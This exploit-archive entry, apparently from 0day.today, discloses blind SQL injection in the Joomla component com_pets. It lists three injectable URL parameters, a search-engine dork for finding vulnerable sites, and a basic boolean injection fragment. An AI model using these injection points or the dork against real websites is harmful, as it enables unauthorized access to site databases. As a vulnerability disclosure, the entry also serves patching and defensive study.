id: 13960
date: 09/03/2010
title: Joomla Component com_pets Multi Blind Sql Injection Vulnerability
author: Forza-Dz
cves: 

=================================================================
Joomla Component com_pets Multi Blind Sql Injection Vulnerability
=================================================================

# Author : Forza-Dz
# Version : All Versions
# Tested on : Win Sp2
############################################################
Dork = inurl:"oops"
############################################################
--- Multi Blind Sql Injection Vulenrability ---
SQL Injection Vulenrability component "com_pets"
http://site/index.php?option=com_pets&Itemid=[SQL]
http://site/index.php?option=com_pets&type=viewEtc&id=[SQL]
http://site/index.php?option=com_pets&task=showProfile&pid=[SQL]
############################################################
===[Injection]===
[SQL] 1=1 or 1=0 "no Exploit for kids"
############################################################
Greetz @ Flit0x-Dz,MCA-CRB,DZ-Z3R0,Perou,Mr-Adel,Nazim-Dz All"MusliM"
############################################################



#  0day.today [2023-03-23]  #